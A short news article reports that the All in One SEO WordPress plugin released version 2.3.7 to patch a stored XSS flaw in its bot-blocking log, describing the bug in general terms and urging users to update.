Semper Fi Web Design, the company behind All in One SEO, a popular WordPress SEO optimization plugin that’s active on more than 1M sites, has released 2.3.7 to patch a persistent XSS security vulnerability.
According to the plugin’s changelog, 2.3.7 sanitizes the Bad Bots module referer and user agent. While it doesn’t sound significant on the surface, this vulnerability can allow anonymous users to store their payload in the WordPress dashboard by simply visiting the public site with a malformed User Agent or Referrer header.
The vulnerability was reported by David Vaartjes and lies within the Bot Blocker functionality which is used to block certain bots or search engine spiders from crawling a site.
“When the User Agent contains one of the pre-configured list of bot names like ‘Abonti’, ‘Bullseye’ or ‘Exabot’ the request is blocked and a 404 is returned,” Vaartjes said.
“If the ‘Track Blocked Bots’ setting is enabled (not by default), blocked requests are logged in that HTML page without proper sanitization or output encoding, allowing XSS.”
Those who have the Track Blocked Bots setting disabled are not susceptible to this vulnerability but are highly encouraged to update to the latest version of the plugin to protect against it. All in One SEO 2.3.7 is available for free from the WordPress plugin directory.